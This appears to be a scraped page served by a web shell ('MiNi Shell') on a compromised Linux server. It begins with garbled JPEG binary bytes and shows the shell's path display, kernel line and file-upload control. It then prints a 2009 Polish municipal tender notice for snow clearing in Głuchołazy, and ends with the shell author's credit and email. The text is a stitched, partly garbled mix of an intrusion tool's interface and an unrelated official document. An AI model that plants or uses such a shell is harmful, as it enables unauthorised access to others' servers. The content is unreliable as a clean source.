JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091014/178143-N-2009.html

<p class="kh_header"><b>Głuchołazy: - Odśnieżanie i posypywanie ( utrzymanie zimowe) na terenie miasta i gminy Głuchołazy  w okresie zimowym na lata 2009-2012.
- Oczyszczanie dróg  i chodników na terenie miasta Głuchołazy w okresie zimowym na lata 2009-2012.</b><br>
<b>Numer ogłoszenia: 178143 - 2009; data zamieszczenia: 14.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Głuchołaz , Rynek 15, 48-340 Głuchołazy, woj. opolskie, tel. 077 4092100, faks 077 4092101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glucholazy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> - Odśnieżanie i posypywanie ( utrzymanie zimowe) na terenie miasta i gminy Głuchołazy  w okresie zimowym na lata 2009-2012.
- Oczyszczanie dróg  i chodników na terenie miasta Głuchołazy w okresie zimowym na lata 2009-2012..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie:
Szczegółowy opis przedmiotu zamówienia na odśnieżanie i posypywanie dróg i chodników został określony w załącznikach do siwz oraz do wzoru umowy : 
-	Wykaz dróg i chodników gminnych - załącznik Nr 1 do umowy
-	Zasady odśnieżania i usuwania gołoledzi na drogach zarządzanych przez Gminę Głuchołazy - załącznik nr 2 do umowy
-	Wymagania techniczno-organizacyjne dla pojazdów samochodowych i sprzętu - załącznik nr 4 do umowy
W okresach bezśnieżnych zimy oczyszczanie dróg i chodników w zależności od potrzeb na zlecenie Zamawiającego, z zastrzeżeniem, że zlecenie może obejmować tylko część dróg i chodników :
- Wykaz dróg - oczyszczanie i zamiatanie - załącznik Nr 3 umowy. 

Wykonawca zobowiązany jest do wykonania usług zgodnie z warunkami technicznymi..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości: 6.000,00zł. Słownie złotych: sześć tysięcy zł.

2. Forma Wadium
1) Wadium może być wniesione w następujących formach:
a) pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym  
    że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 
    9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. 
    Nr 42, poz. 275).
2) W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być   
    sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku  
    lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją,
c) kwotę gwarancji,
d) termin ważności gwarancji,
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie  
    Zamawiającego zawierające oświadczenie:
    - iż Wykonawca, który złożył ofertę w odpowiedzi na wezwanie Zamawiającego, o którym mowa w   
      art. 26 ust. 3 u.p.z.p., nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub  
      pełnomocnictw;
    - iż Wykonawca, którego ofertę wybrano:
       - odmówił podpisania umowy na warunkach określonych w ofercie, lub
       - nie wniósł zabezpieczenia należytego wykonania umowy, lub
       - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
3) Postanowienia rozdz.XII.2.2) stosuje się odpowiednio do poręczeń, określonych powyżej w rozdz. XII pkt.2.1)b) i  2.1)e).

3. Miejsce i sposób wniesienia wadium.

1) Wadium wnoszone w pieniądzu należy wpłacać przelewem na następujący nr konta: WBK S,A. 29 1090 2167 0000 0005 6200 0051z dopiskiem - Wadium na oczyszczanie i odśnieżanie- Głuchołazy.
Zaleca się do oferty dołączyć kopię polecenia przelewu.
2) Wadium wnoszone w innych formach niż pieniądz należy dołączyć w oryginale do oryginalnego   
    egzemplarza oferty.

4. Termin wniesienia wadium.

    Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium 
    w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko
    wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew
    przed upływem terminu składania ofert.

5. Zwrot wadium.

    Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 u.p.z.p.

6. Utrata wadium.

    Zamawiający zatrzymuje wadium wraz z odsetkami:
    - jeżeli Wykonawca, który złożył ofertę w odpowiedzi na wezwanie Zamawiającego, o którym mowa
      w art. 26 ust. 3 u. p.z.p. nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1
      lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie;
    - jeżeli Wykonawca, którego oferta została wybrana:
         -odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
           w ofercie;
         - nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
         - zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących
           po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W przetargu mogą wziąć udział Wykonawcy, którzy spełniają warunki z art. 22 ust. 1 ustawy Pzp (należy w tym zakresie złożyć stosowne oświadczenie, zgodnie z załącznikiem nr 2 do SIWZ), tj.:
1.1.	Posiadają uprawnienia do wykonywania określonej działalności:
W celu potwierdzenia spełniania ww. warunku należy do oferty dołączyć: 
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej.
Dokument, o którym wyżej mowa uważa się za aktualny, w przypadku jego wystawienia lub potwierdzenia jego aktualności przez organ wydający, nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
1.2.	Posiadają niezbędną wiedzę i doświadczenie, oraz dysponują lub będą dysponować potencjałem technicznym do wykonania zamówienia:
1.2.1.    Wykonawca musi wykazać, iż w ostatnich 3 latach przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym   okresie, wykonał lub wykonuje minimum dwie usługi odpowiadające swoim rodzajem stanowiącym przedmiot zamówienia o wartości nie mniejszej niż 200 000,00 zł brutto każda , lub jedną usługę odpowiadającą swoim rodzajem stanowiącym przedmiot zamówienia o wartości nie mniejszej niż 400 000,00 zł brutto, z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie.
1.2.2. Wykonawca musi wykazać niezbędne do wykonania urządzenia tj. min. 1 piaskarka, 1 pług ciężki, 1 pług średni , 1 pług lekki 
1.2.3. zagwarantują całodobową dyspozycyjność (sprzętu i obsługi) poprzez oświadczenie 
1.2.4. dysponują lub w przypadku wyboru będą dysponować placem do składowania piasku i mieszanki ,
1.2.5 dysponują własnym zapleczem warsztatowym oraz dokonują naprawy sprzętu we własnym zakresie, 
1.3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
1.3.1. Wykonawca musi posiadać polisę, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym tj. spełnia - nie spełnia); nie spełnienie chociażby jednego z postawionych warunków udziału w postępowaniu, spowoduje wykluczenie wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania ww. warunku należy do oferty dołączyć: 
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej.
Dokument, o którym wyżej mowa uważa się za aktualny, w przypadku jego wystawienia lub potwierdzenia jego aktualności przez organ wydający, nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
b)	wykaz wykonanych lub wykonywanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia (usługi porównywalne określone powyżej) z podaniem ich wartości oraz daty i miejsca wykonania - zgodnie z zapisem rozdz. XI.1.2.1. SIWZ (wzór oświadczenia-załącznik nr 3 siwz) 
c)	dokumenty (np. referencje) potwierdzające, że usługi, o których wyżej mowa, zostały wykonane należycie zgodnie z zapisem rozdz. XI.1.2.1. SIWZ 
d)	wykaz niezbędnych do wykonania urządzeń zgodnie z zapisem rodz. XI.1.2.2 siwz (wzór wykazu-załącznik nr 4 siwz)
e)	oświadczenie gwarantujące całodobową dyspozycyjność zgodnie z zapisem rodz. XI.1.2.3 siwz (zawarte w formularzu oferty)
f)	oświadczenie gwarantujące dysponowanie placem  zgodnie z zapisem rodz. XI.1.2.4 siwz (zawarte w formularzu oferty)
g)	oświadczenie gwarantujące  dysponowanie własnym zapleczem warsztatowym oraz dokonywanie naprawy sprzętu we własnym zakresie, zgodnie z zapisem rodz. XI.1.2.5 siwz (zawarte w formularzu oferty). 
h) polisę na kwotę minimum 100.000,00 zł, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://gmina.glucholazy.sisco.info/?przetargi=1&rok=2009.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Głuchołazach ul. Rynek 15  48-340 Głuchołazy, pok. nr 14 - Wydział Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2009 godzina 10:00, miejsce: Urząd Miejski w Głuchołazach ul. Rynek 15  48-340 Głuchołazy, pok. nr 11 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com